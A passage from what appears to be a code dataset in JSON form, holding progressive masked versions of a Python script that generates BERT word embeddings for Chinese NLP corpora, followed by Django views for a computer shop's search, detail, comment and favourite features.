if buffer == words[tid]:
sent_tensor.append(np.stack(token_tensor).mean(axis=0))
token_tensor = []
buffer = ''
tid += 1
# print(len(valid))
# exit()
if tid != len(words) or len(sent_tensor) != len(words):
print(sent.split())
print(tokens)
exit()
batch.append(np.stack(sent_tensor))
return batch
def generate_bert(path, output, embed_fun=embed_sum):
print(output)
total = 0
with open(path) as src:
batch = []
tensor = []
for line in src:
line = line.strip()
if len(line) == 0:
continue
batch.append(CharTable.convert(line).replace('—', '-')
.replace('‘', '\'')
.replace('…', '.')
.replace('坜', '壢')
.replace('唛', '麦')
.replace('ㄅㄆㄇㄈ', '呀呀')
.replace('’', '\''))
if len(batch) and len(batch) % 100 == 0:
tensor.extend(embed_fun(batch))
total += len(batch)
print(total)
batch = []
if len(batch):
tensor.extend(embed_fun(batch))
total += len(batch)
print(total)
with open(output, 'wb') as f:
pickle.dump(tensor, f)
if __name__ == '__main__':
# generate_bert('data/SemEval-2016/news.test.sent.txt', 'data/SemEval-2016/news.test.bert', embed_fun=embed_sum)
# generate_bert('data/SemEval-2016/news.valid.sent.txt', 'data/SemEval-2016/news.valid.bert', embed_fun=embed_sum)
# generate_bert('data/SemEval-2016/news.train.sent.txt', 'data/SemEval-2016/news.train.bert', embed_fun=embed_sum)
#
# generate_bert('data/SemEval-2016/text.test.sent.txt', 'data/SemEval-2016/text.test.bert', embed_fun=embed_sum)
# generate_bert('data/SemEval-2016/text.valid.sent.txt', 'data/SemEval-2016/text.valid.bert', embed_fun=embed_sum)
# generate_bert('data/SemEval-2016/text.train.sent.txt', 'data/SemEval-2016/text.train.bert', embed_fun=embed_sum)
generate_bert('data/semeval15/cz.pas.dev.sent.txt', 'data/embedding/bert_base_sum/cz.pas.dev.bert',
embed_fun=embed_sum)
generate_bert('data/semeval15/cz.pas.train.sent.txt', 'data/embedding/bert_base_sum/cz.pas.train.bert',
embed_fun=embed_sum)
generate_bert('data/semeval15/cz.id.pas.sent.txt', 'data/embedding/bert_base_sum/cz.id.pas.bert',
embed_fun=embed_sum)
# generate_bert('data/ctb5.1-pos/dev.short.sent.txt', 'data/embedding/bert_base_sum/ctb.pos.dev.bert',
# embed_fun=embed_sum)
# generate_bert('data/ctb5.1-pos/test.short.sent.txt', 'data/embedding/bert_base_sum/ctb.pos.test.bert',
# embed_fun=embed_sum)
# generate_bert('data/ctb5.1-pos/train.short.sent.txt', 'data/embedding/bert_base_sum/ctb.pos.train.bert',
# embed_fun=embed_sum)
# generate_bert('data/msra/dev.short.sent.txt', 'data/embedding/bert_base_sum/msra.dev.bert',
# embed_fun=embed_sum)
# generate_bert('data/msra/test.short.sent.txt', 'data/embedding/bert_base_sum/msra.test.bert',
# embed_fun=embed_sum)
# generate_bert('data/msra/train.short.sent.txt', 'data/embedding/bert_base_sum/msra.train.bert',
# embed_fun=embed_sum)
# generate_bert('data/msra/test.auto.short.sent.txt', 'data/embedding/bert_base_sum/msra.test.auto.bert',
# embed_fun=embed_sum)
# generate_bert('data/msra/test.auto.short.sent.txt', 'data/embedding/bert_base_sum/msra.test.auto.bert',
# embed_fun=embed_sum)
# generate_bert('data/msra/dev.auto.short.sent.txt', 'data/embedding/bert_base_sum/msra.dev.auto.bert',
# embed_fun=embed_sum)
# generate_bert('data/msra/train.auto.short.sent.txt', 'data/embedding/bert_base_sum/msra.train.auto.bert',
# embed_fun=embed_sum)
# generate_bert('data/ctb5/dev.sent.txt', 'data/embedding/bert_base_sum/ctb.dev.bert',
# embed_fun=embed_sum)
# generate_bert('data/ctb5/test.sent.txt', 'data/embedding/bert_base_sum/ctb.test.bert',
# embed_fun=embed_sum)
# generate_bert('data/ctb5/train.sent.txt', 'data/embedding/bert_base_sum/ctb.train.bert',
# embed_fun=embed_sum)
|
flexible
|
{
"blob_id": "38e167630519b73bffea4ff527bc7b7272a49f1a",
"index": 348,
"step-1": "<mask token>\n\n\ndef embed_last_token(text):\n result = bc.encode(text, show_tokens=True)\n batch = []\n for sent, tensor, tokens in zip(text, result[0], result[1]):\n valid = []\n tid = 0\n buffer = ''\n words = sent.lower().split()\n for i, t in enumerate(tokens):\n if t == '[CLS]' or t == '[SEP]':\n continue\n else:\n if t.startswith('##'):\n t = t[2:]\n elif t == '[UNK]':\n t = words[tid][len(buffer)]\n buffer += t\n if buffer == words[tid]:\n valid.append(i)\n buffer = ''\n tid += 1\n if len(valid) != len(sent.split()) or tid != len(words):\n print(valid)\n print(sent.split())\n print(result[1])\n batch.append(tensor[valid, :])\n return batch\n\n\ndef embed_sum(text):\n result = bc.encode(text, show_tokens=True)\n batch = []\n for sent, tensor, tokens in zip(text, result[0], result[1]):\n token_tensor = []\n sent_tensor = []\n tid = 0\n buffer = ''\n words = sent.lower().split()\n for i, t in enumerate(tokens):\n if t == '[CLS]' or t == '[SEP]':\n continue\n else:\n if t.startswith('##'):\n t = t[2:]\n elif t == '[UNK]':\n t = words[tid][len(buffer)]\n buffer += t\n token_tensor.append(tensor[i, :])\n if buffer == words[tid]:\n sent_tensor.append(np.stack(token_tensor).mean(axis=0))\n token_tensor = []\n buffer = ''\n tid += 1\n if tid != len(words) or len(sent_tensor) != len(words):\n print(sent.split())\n print(tokens)\n exit()\n batch.append(np.stack(sent_tensor))\n return batch\n\n\ndef generate_bert(path, output, embed_fun=embed_sum):\n print(output)\n total = 0\n with open(path) as src:\n batch = []\n tensor = []\n for line in src:\n line = line.strip()\n if len(line) == 0:\n continue\n batch.append(CharTable.convert(line).replace('—', '-').replace(\n '‘', \"'\").replace('…', '.').replace('坜', '壢').replace('唛',\n '麦').replace('ㄅㄆㄇㄈ', '呀呀').replace('’', \"'\"))\n if len(batch) and len(batch) % 100 == 0:\n tensor.extend(embed_fun(batch))\n total += len(batch)\n print(total)\n batch = []\n if len(batch):\n tensor.extend(embed_fun(batch))\n total += len(batch)\n print(total)\n with open(output, 'wb') as f:\n pickle.dump(tensor, f)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef embed_last_token(text):\n result = bc.encode(text, show_tokens=True)\n batch = []\n for sent, tensor, tokens in zip(text, result[0], result[1]):\n valid = []\n tid = 0\n buffer = ''\n words = sent.lower().split()\n for i, t in enumerate(tokens):\n if t == '[CLS]' or t == '[SEP]':\n continue\n else:\n if t.startswith('##'):\n t = t[2:]\n elif t == '[UNK]':\n t = words[tid][len(buffer)]\n buffer += t\n if buffer == words[tid]:\n valid.append(i)\n buffer = ''\n tid += 1\n if len(valid) != len(sent.split()) or tid != len(words):\n print(valid)\n print(sent.split())\n print(result[1])\n batch.append(tensor[valid, :])\n return batch\n\n\ndef embed_sum(text):\n result = bc.encode(text, show_tokens=True)\n batch = []\n for sent, tensor, tokens in zip(text, result[0], result[1]):\n token_tensor = []\n sent_tensor = []\n tid = 0\n buffer = ''\n words = sent.lower().split()\n for i, t in enumerate(tokens):\n if t == '[CLS]' or t == '[SEP]':\n continue\n else:\n if t.startswith('##'):\n t = t[2:]\n elif t == '[UNK]':\n t = words[tid][len(buffer)]\n buffer += t\n token_tensor.append(tensor[i, :])\n if buffer == words[tid]:\n sent_tensor.append(np.stack(token_tensor).mean(axis=0))\n token_tensor = []\n buffer = ''\n tid += 1\n if tid != len(words) or len(sent_tensor) != len(words):\n print(sent.split())\n print(tokens)\n exit()\n batch.append(np.stack(sent_tensor))\n return batch\n\n\ndef generate_bert(path, output, embed_fun=embed_sum):\n print(output)\n total = 0\n with open(path) as src:\n batch = []\n tensor = []\n for line in src:\n line = line.strip()\n if len(line) == 0:\n continue\n batch.append(CharTable.convert(line).replace('—', '-').replace(\n '‘', \"'\").replace('…', '.').replace('坜', '壢').replace('唛',\n '麦').replace('ㄅㄆㄇㄈ', '呀呀').replace('’', \"'\"))\n if len(batch) and len(batch) % 100 == 0:\n tensor.extend(embed_fun(batch))\n total += len(batch)\n print(total)\n batch = []\n if len(batch):\n tensor.extend(embed_fun(batch))\n total += len(batch)\n print(total)\n with open(output, 'wb') as f:\n pickle.dump(tensor, f)\n\n\nif __name__ == '__main__':\n generate_bert('data/semeval15/cz.pas.dev.sent.txt',\n 'data/embedding/bert_base_sum/cz.pas.dev.bert', embed_fun=embed_sum)\n generate_bert('data/semeval15/cz.pas.train.sent.txt',\n 'data/embedding/bert_base_sum/cz.pas.train.bert', embed_fun=embed_sum)\n generate_bert('data/semeval15/cz.id.pas.sent.txt',\n 'data/embedding/bert_base_sum/cz.id.pas.bert', embed_fun=embed_sum)\n",
"step-3": "<mask token>\nCharTable = JClass('com.hankcs.hanlp.dictionary.other.CharTable')\nbc = BertClient(ip='127.0.0.1')\n\n\ndef embed_last_token(text):\n result = bc.encode(text, show_tokens=True)\n batch = []\n for sent, tensor, tokens in zip(text, result[0], result[1]):\n valid = []\n tid = 0\n buffer = ''\n words = sent.lower().split()\n for i, t in enumerate(tokens):\n if t == '[CLS]' or t == '[SEP]':\n continue\n else:\n if t.startswith('##'):\n t = t[2:]\n elif t == '[UNK]':\n t = words[tid][len(buffer)]\n buffer += t\n if buffer == words[tid]:\n valid.append(i)\n buffer = ''\n tid += 1\n if len(valid) != len(sent.split()) or tid != len(words):\n print(valid)\n print(sent.split())\n print(result[1])\n batch.append(tensor[valid, :])\n return batch\n\n\ndef embed_sum(text):\n result = bc.encode(text, show_tokens=True)\n batch = []\n for sent, tensor, tokens in zip(text, result[0], result[1]):\n token_tensor = []\n sent_tensor = []\n tid = 0\n buffer = ''\n words = sent.lower().split()\n for i, t in enumerate(tokens):\n if t == '[CLS]' or t == '[SEP]':\n continue\n else:\n if t.startswith('##'):\n t = t[2:]\n elif t == '[UNK]':\n t = words[tid][len(buffer)]\n buffer += t\n token_tensor.append(tensor[i, :])\n if buffer == words[tid]:\n sent_tensor.append(np.stack(token_tensor).mean(axis=0))\n token_tensor = []\n buffer = ''\n tid += 1\n if tid != len(words) or len(sent_tensor) != len(words):\n print(sent.split())\n print(tokens)\n exit()\n batch.append(np.stack(sent_tensor))\n return batch\n\n\ndef generate_bert(path, output, embed_fun=embed_sum):\n print(output)\n total = 0\n with open(path) as src:\n batch = []\n tensor = []\n for line in src:\n line = line.strip()\n if len(line) == 0:\n continue\n batch.append(CharTable.convert(line).replace('—', '-').replace(\n '‘', \"'\").replace('…', '.').replace('坜', '壢').replace('唛',\n '麦').replace('ㄅㄆㄇㄈ', '呀呀').replace('’', \"'\"))\n if len(batch) and len(batch) % 100 == 0:\n tensor.extend(embed_fun(batch))\n total += len(batch)\n print(total)\n batch = []\n if len(batch):\n tensor.extend(embed_fun(batch))\n total += len(batch)\n print(total)\n with open(output, 'wb') as f:\n pickle.dump(tensor, f)\n\n\nif __name__ == '__main__':\n generate_bert('data/semeval15/cz.pas.dev.sent.txt',\n 'data/embedding/bert_base_sum/cz.pas.dev.bert', embed_fun=embed_sum)\n generate_bert('data/semeval15/cz.pas.train.sent.txt',\n 'data/embedding/bert_base_sum/cz.pas.train.bert', embed_fun=embed_sum)\n generate_bert('data/semeval15/cz.id.pas.sent.txt',\n 'data/embedding/bert_base_sum/cz.id.pas.bert', embed_fun=embed_sum)\n",
"step-4": "import pickle\nimport numpy as np\nfrom bert_serving.client import BertClient\nfrom pyhanlp import *\nCharTable = JClass('com.hankcs.hanlp.dictionary.other.CharTable')\nbc = BertClient(ip='127.0.0.1')\n\n\ndef embed_last_token(text):\n result = bc.encode(text, show_tokens=True)\n batch = []\n for sent, tensor, tokens in zip(text, result[0], result[1]):\n valid = []\n tid = 0\n buffer = ''\n words = sent.lower().split()\n for i, t in enumerate(tokens):\n if t == '[CLS]' or t == '[SEP]':\n continue\n else:\n if t.startswith('##'):\n t = t[2:]\n elif t == '[UNK]':\n t = words[tid][len(buffer)]\n buffer += t\n if buffer == words[tid]:\n valid.append(i)\n buffer = ''\n tid += 1\n if len(valid) != len(sent.split()) or tid != len(words):\n print(valid)\n print(sent.split())\n print(result[1])\n batch.append(tensor[valid, :])\n return batch\n\n\ndef embed_sum(text):\n result = bc.encode(text, show_tokens=True)\n batch = []\n for sent, tensor, tokens in zip(text, result[0], result[1]):\n token_tensor = []\n sent_tensor = []\n tid = 0\n buffer = ''\n words = sent.lower().split()\n for i, t in enumerate(tokens):\n if t == '[CLS]' or t == '[SEP]':\n continue\n else:\n if t.startswith('##'):\n t = t[2:]\n elif t == '[UNK]':\n t = words[tid][len(buffer)]\n buffer += t\n token_tensor.append(tensor[i, :])\n if buffer == words[tid]:\n sent_tensor.append(np.stack(token_tensor).mean(axis=0))\n token_tensor = []\n buffer = ''\n tid += 1\n if tid != len(words) or len(sent_tensor) != len(words):\n print(sent.split())\n print(tokens)\n exit()\n batch.append(np.stack(sent_tensor))\n return batch\n\n\ndef generate_bert(path, output, embed_fun=embed_sum):\n print(output)\n total = 0\n with open(path) as src:\n batch = []\n tensor = []\n for line in src:\n line = line.strip()\n if len(line) == 0:\n continue\n batch.append(CharTable.convert(line).replace('—', '-').replace(\n '‘', \"'\").replace('…', '.').replace('坜', '壢').replace('唛',\n '麦').replace('ㄅㄆㄇㄈ', '呀呀').replace('’', \"'\"))\n if len(batch) and len(batch) % 100 == 0:\n tensor.extend(embed_fun(batch))\n total += len(batch)\n print(total)\n batch = []\n if len(batch):\n tensor.extend(embed_fun(batch))\n total += len(batch)\n print(total)\n with open(output, 'wb') as f:\n pickle.dump(tensor, f)\n\n\nif __name__ == '__main__':\n generate_bert('data/semeval15/cz.pas.dev.sent.txt',\n 'data/embedding/bert_base_sum/cz.pas.dev.bert', embed_fun=embed_sum)\n generate_bert('data/semeval15/cz.pas.train.sent.txt',\n 'data/embedding/bert_base_sum/cz.pas.train.bert', embed_fun=embed_sum)\n generate_bert('data/semeval15/cz.id.pas.sent.txt',\n 'data/embedding/bert_base_sum/cz.id.pas.bert', embed_fun=embed_sum)\n",
"step-5": "# -*- coding:utf-8 -*-\n# Author: hankcs\n# Date: 2019-01-13 15:01\nimport pickle\n\nimport numpy as np\nfrom bert_serving.client import BertClient\nfrom pyhanlp import *\n\nCharTable = JClass('com.hankcs.hanlp.dictionary.other.CharTable')\n\n# bc = BertClient(ip='192.168.1.88') # ip address of the server\nbc = BertClient(ip='127.0.0.1') # ip address of the GPU machine\n\n\ndef embed_last_token(text):\n result = bc.encode(text, show_tokens=True)\n # print(result)\n batch = []\n for sent, tensor, tokens in zip(text, result[0], result[1]):\n valid = []\n tid = 0\n buffer = ''\n words = sent.lower().split()\n for i, t in enumerate(tokens):\n if t == '[CLS]' or t == '[SEP]':\n continue\n else:\n if t.startswith('##'):\n t = t[2:]\n elif t == '[UNK]':\n t = words[tid][len(buffer)]\n buffer += t\n if buffer == words[tid]:\n valid.append(i)\n buffer = ''\n tid += 1\n # print(len(valid))\n # exit()\n if len(valid) != len(sent.split()) or tid != len(words):\n print(valid)\n print(sent.split())\n print(result[1])\n batch.append(tensor[valid, :])\n return batch\n\n\ndef embed_sum(text):\n result = bc.encode(text, show_tokens=True)\n # print(result)\n batch = []\n for sent, tensor, tokens in zip(text, result[0], result[1]):\n token_tensor = []\n sent_tensor = []\n tid = 0\n buffer = ''\n words = sent.lower().split()\n for i, t in enumerate(tokens):\n if t == '[CLS]' or t == '[SEP]':\n continue\n else:\n if t.startswith('##'):\n t = t[2:]\n elif t == '[UNK]':\n t = words[tid][len(buffer)]\n buffer += t\n token_tensor.append(tensor[i, :])\n if buffer == words[tid]:\n sent_tensor.append(np.stack(token_tensor).mean(axis=0))\n token_tensor = []\n buffer = ''\n tid += 1\n # print(len(valid))\n # exit()\n if tid != len(words) or len(sent_tensor) != len(words):\n print(sent.split())\n print(tokens)\n exit()\n batch.append(np.stack(sent_tensor))\n return batch\n\n\ndef generate_bert(path, output, embed_fun=embed_sum):\n print(output)\n total = 0\n with open(path) as src:\n batch = []\n tensor = []\n for line in src:\n line = line.strip()\n if len(line) == 0:\n continue\n batch.append(CharTable.convert(line).replace('—', '-')\n .replace('‘', '\\'')\n .replace('…', '.')\n .replace('坜', '壢')\n .replace('唛', '麦')\n .replace('ㄅㄆㄇㄈ', '呀呀')\n .replace('’', '\\''))\n if len(batch) and len(batch) % 100 == 0:\n tensor.extend(embed_fun(batch))\n total += len(batch)\n print(total)\n batch = []\n if len(batch):\n tensor.extend(embed_fun(batch))\n total += len(batch)\n print(total)\n with open(output, 'wb') as f:\n pickle.dump(tensor, f)\n\n\nif __name__ == '__main__':\n # generate_bert('data/SemEval-2016/news.test.sent.txt', 'data/SemEval-2016/news.test.bert', embed_fun=embed_sum)\n # generate_bert('data/SemEval-2016/news.valid.sent.txt', 'data/SemEval-2016/news.valid.bert', embed_fun=embed_sum)\n # generate_bert('data/SemEval-2016/news.train.sent.txt', 'data/SemEval-2016/news.train.bert', embed_fun=embed_sum)\n #\n # generate_bert('data/SemEval-2016/text.test.sent.txt', 'data/SemEval-2016/text.test.bert', embed_fun=embed_sum)\n # generate_bert('data/SemEval-2016/text.valid.sent.txt', 'data/SemEval-2016/text.valid.bert', embed_fun=embed_sum)\n # generate_bert('data/SemEval-2016/text.train.sent.txt', 'data/SemEval-2016/text.train.bert', embed_fun=embed_sum)\n\n generate_bert('data/semeval15/cz.pas.dev.sent.txt', 'data/embedding/bert_base_sum/cz.pas.dev.bert',\n embed_fun=embed_sum)\n generate_bert('data/semeval15/cz.pas.train.sent.txt', 'data/embedding/bert_base_sum/cz.pas.train.bert',\n embed_fun=embed_sum)\n generate_bert('data/semeval15/cz.id.pas.sent.txt', 'data/embedding/bert_base_sum/cz.id.pas.bert',\n embed_fun=embed_sum)\n\n # generate_bert('data/ctb5.1-pos/dev.short.sent.txt', 'data/embedding/bert_base_sum/ctb.pos.dev.bert',\n # embed_fun=embed_sum)\n # generate_bert('data/ctb5.1-pos/test.short.sent.txt', 'data/embedding/bert_base_sum/ctb.pos.test.bert',\n # embed_fun=embed_sum)\n # generate_bert('data/ctb5.1-pos/train.short.sent.txt', 'data/embedding/bert_base_sum/ctb.pos.train.bert',\n # embed_fun=embed_sum)\n\n # generate_bert('data/msra/dev.short.sent.txt', 'data/embedding/bert_base_sum/msra.dev.bert',\n # embed_fun=embed_sum)\n # generate_bert('data/msra/test.short.sent.txt', 'data/embedding/bert_base_sum/msra.test.bert',\n # embed_fun=embed_sum)\n # generate_bert('data/msra/train.short.sent.txt', 'data/embedding/bert_base_sum/msra.train.bert',\n # embed_fun=embed_sum)\n # generate_bert('data/msra/test.auto.short.sent.txt', 'data/embedding/bert_base_sum/msra.test.auto.bert',\n # embed_fun=embed_sum)\n\n # generate_bert('data/msra/test.auto.short.sent.txt', 'data/embedding/bert_base_sum/msra.test.auto.bert',\n # embed_fun=embed_sum)\n # generate_bert('data/msra/dev.auto.short.sent.txt', 'data/embedding/bert_base_sum/msra.dev.auto.bert',\n # embed_fun=embed_sum)\n # generate_bert('data/msra/train.auto.short.sent.txt', 'data/embedding/bert_base_sum/msra.train.auto.bert',\n # embed_fun=embed_sum)\n\n # generate_bert('data/ctb5/dev.sent.txt', 'data/embedding/bert_base_sum/ctb.dev.bert',\n # embed_fun=embed_sum)\n # generate_bert('data/ctb5/test.sent.txt', 'data/embedding/bert_base_sum/ctb.test.bert',\n # embed_fun=embed_sum)\n # generate_bert('data/ctb5/train.sent.txt', 'data/embedding/bert_base_sum/ctb.train.bert',\n # embed_fun=embed_sum)\n",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
from django.shortcuts import *
from shop.models import *
from django.db import transaction
from django.core.exceptions import *
@transaction.atomic
def computers(request):
ctx = {}
computer = Computer.objects.all()
ctx['brand'] = Brand.objects.all()
if request.method == 'POST':
if request.POST['computer_id'] != '':
computer = computer.filter(computer_id__icontains=request.POST['computer_id'])
if request.POST['cpu'] != '':
computer = computer.filter(cpu__icontains=request.POST['cpu'])
if request.POST['graphics_card'] != '':
computer = computer.filter(graphics_card__icontains=request.POST['graphics_card'])
try:
if request.POST['minMemory'] != '':
computer = computer.filter(memory__gte=int(request.POST['minMemory']))
if request.POST['maxMemory'] != '':
computer = computer.exclude(memory__gte=int(request.POST['maxMemory']))
if request.POST['minssd'] != '':
computer = computer.filter(ssd_capacity__gte=int(request.POST['minssd']))
if request.POST['maxssd'] != '':
computer = computer.exclude(ssd_capacity__gte=int(request.POST['maxssd']))
if request.POST['minDisk'] != '':
computer = computer.filter(disk_capacity__gte=int(request.POST['minDisk']))
if request.POST['maxDisk'] != '':
computer = computer.exclude(disk_capacity__gte=int(request.POST['maxDisk']))
except ValueError:
return render(request, 'Dashio/error.html', {'error': "请输入整数"})
if request.POST.get('brand', '') != '':
print(request.POST['brand'])
computer = computer.filter(brand__name__icontains=request.POST['brand'])
if request.POST['sort'] != '':
sortKey = request.POST['sortType'] + request.POST['sort']
computer = computer.order_by(sortKey)
ctx['computer'] = computer
return render(request, "Dashio/computers.html", ctx)
@transaction.atomic
def details(request, computer_id):
rtx = {}
rtx['isUser'] = request.session['type'] == 'user'
rtx['computer'] = get_object_or_404(Computer, pk=computer_id)
rtx['markAmount'] = mark.objects.filter(computer_id__computer_id=computer_id).count()
rtx['sell'] = Sell.objects.filter(computer_id__computer_id=computer_id)
rtx['user_id'] = request.session['id']
rtx['sellAmount'] = Buy.objects.filter(computer_id__computer_id=computer_id).count()
rtx['comments'] = computer_comment.objects.filter(computer_id__computer_id=computer_id).order_by('-comment_date')
rtx['buys'] = Buy.objects.filter(computer_id__computer_id=computer_id).order_by('-buy_time')[:5]
if rtx['isUser']:
rtx['mark'] = ('收藏' if mark.objects.filter(user_id__user_id=rtx['user_id'], computer_id=rtx['computer']).count() == 0 else '取消收藏')
return render(request, 'Dashio/computer_detail.html', rtx)
@transaction.atomic
def post(request, user_id, computer_id):
if request.method == 'POST':
computer = Computer.objects.get(pk=computer_id)
user = User.objects.get(pk=user_id)
computer_comment(computer_id=computer, user_id=user, content=request.POST['comment']).save()
return HttpResponseRedirect(reverse('shop:computerDetail', args=(computer_id, )))
def makeMark(request, computer_id, user_id):
try:
m = mark.objects.get(computer_id__computer_id=computer_id, user_id__user_id=user_id)
m.delete()
except ObjectDoesNotExist:
computer = get_object_or_404(Computer, pk=computer_id)
user = get_object_or_404(User, pk=user_id)
mark(computer_id=computer, user_id=user).save()
return HttpResponseRedirect(reverse('shop:computerDetail', args=(computer_id, )))
|
normal
|
{
"blob_id": "18689741a33e6d17e694ee0619a1f36d8d178cbb",
"index": 3223,
"step-1": "<mask token>\n\n\n@transaction.atomic\ndef computers(request):\n ctx = {}\n computer = Computer.objects.all()\n ctx['brand'] = Brand.objects.all()\n if request.method == 'POST':\n if request.POST['computer_id'] != '':\n computer = computer.filter(computer_id__icontains=request.POST[\n 'computer_id'])\n if request.POST['cpu'] != '':\n computer = computer.filter(cpu__icontains=request.POST['cpu'])\n if request.POST['graphics_card'] != '':\n computer = computer.filter(graphics_card__icontains=request.\n POST['graphics_card'])\n try:\n if request.POST['minMemory'] != '':\n computer = computer.filter(memory__gte=int(request.POST[\n 'minMemory']))\n if request.POST['maxMemory'] != '':\n computer = computer.exclude(memory__gte=int(request.POST[\n 'maxMemory']))\n if request.POST['minssd'] != '':\n computer = computer.filter(ssd_capacity__gte=int(request.\n POST['minssd']))\n if request.POST['maxssd'] != '':\n computer = computer.exclude(ssd_capacity__gte=int(request.\n POST['maxssd']))\n if request.POST['minDisk'] != '':\n computer = computer.filter(disk_capacity__gte=int(request.\n POST['minDisk']))\n if request.POST['maxDisk'] != '':\n computer = computer.exclude(disk_capacity__gte=int(request.\n POST['maxDisk']))\n except ValueError:\n return render(request, 'Dashio/error.html', {'error': '请输入整数'})\n if request.POST.get('brand', '') != '':\n print(request.POST['brand'])\n computer = computer.filter(brand__name__icontains=request.POST[\n 'brand'])\n if request.POST['sort'] != '':\n sortKey = request.POST['sortType'] + request.POST['sort']\n computer = computer.order_by(sortKey)\n ctx['computer'] = computer\n return render(request, 'Dashio/computers.html', ctx)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\n@transaction.atomic\ndef computers(request):\n ctx = {}\n computer = Computer.objects.all()\n ctx['brand'] = Brand.objects.all()\n if request.method == 'POST':\n if request.POST['computer_id'] != '':\n computer = computer.filter(computer_id__icontains=request.POST[\n 'computer_id'])\n if request.POST['cpu'] != '':\n computer = computer.filter(cpu__icontains=request.POST['cpu'])\n if request.POST['graphics_card'] != '':\n computer = computer.filter(graphics_card__icontains=request.\n POST['graphics_card'])\n try:\n if request.POST['minMemory'] != '':\n computer = computer.filter(memory__gte=int(request.POST[\n 'minMemory']))\n if request.POST['maxMemory'] != '':\n computer = computer.exclude(memory__gte=int(request.POST[\n 'maxMemory']))\n if request.POST['minssd'] != '':\n computer = computer.filter(ssd_capacity__gte=int(request.\n POST['minssd']))\n if request.POST['maxssd'] != '':\n computer = computer.exclude(ssd_capacity__gte=int(request.\n POST['maxssd']))\n if request.POST['minDisk'] != '':\n computer = computer.filter(disk_capacity__gte=int(request.\n POST['minDisk']))\n if request.POST['maxDisk'] != '':\n computer = computer.exclude(disk_capacity__gte=int(request.\n POST['maxDisk']))\n except ValueError:\n return render(request, 'Dashio/error.html', {'error': '请输入整数'})\n if request.POST.get('brand', '') != '':\n print(request.POST['brand'])\n computer = computer.filter(brand__name__icontains=request.POST[\n 'brand'])\n if request.POST['sort'] != '':\n sortKey = request.POST['sortType'] + request.POST['sort']\n computer = computer.order_by(sortKey)\n ctx['computer'] = computer\n return render(request, 'Dashio/computers.html', ctx)\n\n\n<mask token>\n\n\n@transaction.atomic\ndef post(request, user_id, computer_id):\n if request.method == 'POST':\n computer = Computer.objects.get(pk=computer_id)\n user = User.objects.get(pk=user_id)\n computer_comment(computer_id=computer, user_id=user, content=\n request.POST['comment']).save()\n return HttpResponseRedirect(reverse('shop:computerDetail', args=(\n computer_id,)))\n\n\ndef makeMark(request, computer_id, user_id):\n try:\n m = mark.objects.get(computer_id__computer_id=computer_id,\n user_id__user_id=user_id)\n m.delete()\n except ObjectDoesNotExist:\n computer = get_object_or_404(Computer, pk=computer_id)\n user = get_object_or_404(User, pk=user_id)\n mark(computer_id=computer, user_id=user).save()\n return HttpResponseRedirect(reverse('shop:computerDetail', args=(\n computer_id,)))\n",
"step-3": "<mask token>\n\n\n@transaction.atomic\ndef computers(request):\n ctx = {}\n computer = Computer.objects.all()\n ctx['brand'] = Brand.objects.all()\n if request.method == 'POST':\n if request.POST['computer_id'] != '':\n computer = computer.filter(computer_id__icontains=request.POST[\n 'computer_id'])\n if request.POST['cpu'] != '':\n computer = computer.filter(cpu__icontains=request.POST['cpu'])\n if request.POST['graphics_card'] != '':\n computer = computer.filter(graphics_card__icontains=request.\n POST['graphics_card'])\n try:\n if request.POST['minMemory'] != '':\n computer = computer.filter(memory__gte=int(request.POST[\n 'minMemory']))\n if request.POST['maxMemory'] != '':\n computer = computer.exclude(memory__gte=int(request.POST[\n 'maxMemory']))\n if request.POST['minssd'] != '':\n computer = computer.filter(ssd_capacity__gte=int(request.\n POST['minssd']))\n if request.POST['maxssd'] != '':\n computer = computer.exclude(ssd_capacity__gte=int(request.\n POST['maxssd']))\n if request.POST['minDisk'] != '':\n computer = computer.filter(disk_capacity__gte=int(request.\n POST['minDisk']))\n if request.POST['maxDisk'] != '':\n computer = computer.exclude(disk_capacity__gte=int(request.\n POST['maxDisk']))\n except ValueError:\n return render(request, 'Dashio/error.html', {'error': '请输入整数'})\n if request.POST.get('brand', '') != '':\n print(request.POST['brand'])\n computer = computer.filter(brand__name__icontains=request.POST[\n 'brand'])\n if request.POST['sort'] != '':\n sortKey = request.POST['sortType'] + request.POST['sort']\n computer = computer.order_by(sortKey)\n ctx['computer'] = computer\n return render(request, 'Dashio/computers.html', ctx)\n\n\n@transaction.atomic\ndef details(request, computer_id):\n rtx = {}\n rtx['isUser'] = request.session['type'] == 'user'\n rtx['computer'] = get_object_or_404(Computer, pk=computer_id)\n rtx['markAmount'] = mark.objects.filter(computer_id__computer_id=\n computer_id).count()\n rtx['sell'] = Sell.objects.filter(computer_id__computer_id=computer_id)\n rtx['user_id'] = request.session['id']\n rtx['sellAmount'] = Buy.objects.filter(computer_id__computer_id=computer_id\n ).count()\n rtx['comments'] = computer_comment.objects.filter(computer_id__computer_id\n =computer_id).order_by('-comment_date')\n rtx['buys'] = Buy.objects.filter(computer_id__computer_id=computer_id\n ).order_by('-buy_time')[:5]\n if rtx['isUser']:\n rtx['mark'] = '收藏' if mark.objects.filter(user_id__user_id=rtx[\n 'user_id'], computer_id=rtx['computer']).count() == 0 else '取消收藏'\n return render(request, 'Dashio/computer_detail.html', rtx)\n\n\n@transaction.atomic\ndef post(request, user_id, computer_id):\n if request.method == 'POST':\n computer = Computer.objects.get(pk=computer_id)\n user = User.objects.get(pk=user_id)\n computer_comment(computer_id=computer, user_id=user, content=\n request.POST['comment']).save()\n return HttpResponseRedirect(reverse('shop:computerDetail', args=(\n computer_id,)))\n\n\ndef makeMark(request, computer_id, user_id):\n try:\n m = mark.objects.get(computer_id__computer_id=computer_id,\n user_id__user_id=user_id)\n m.delete()\n except ObjectDoesNotExist:\n computer = get_object_or_404(Computer, pk=computer_id)\n user = get_object_or_404(User, pk=user_id)\n mark(computer_id=computer, user_id=user).save()\n return HttpResponseRedirect(reverse('shop:computerDetail', args=(\n computer_id,)))\n",
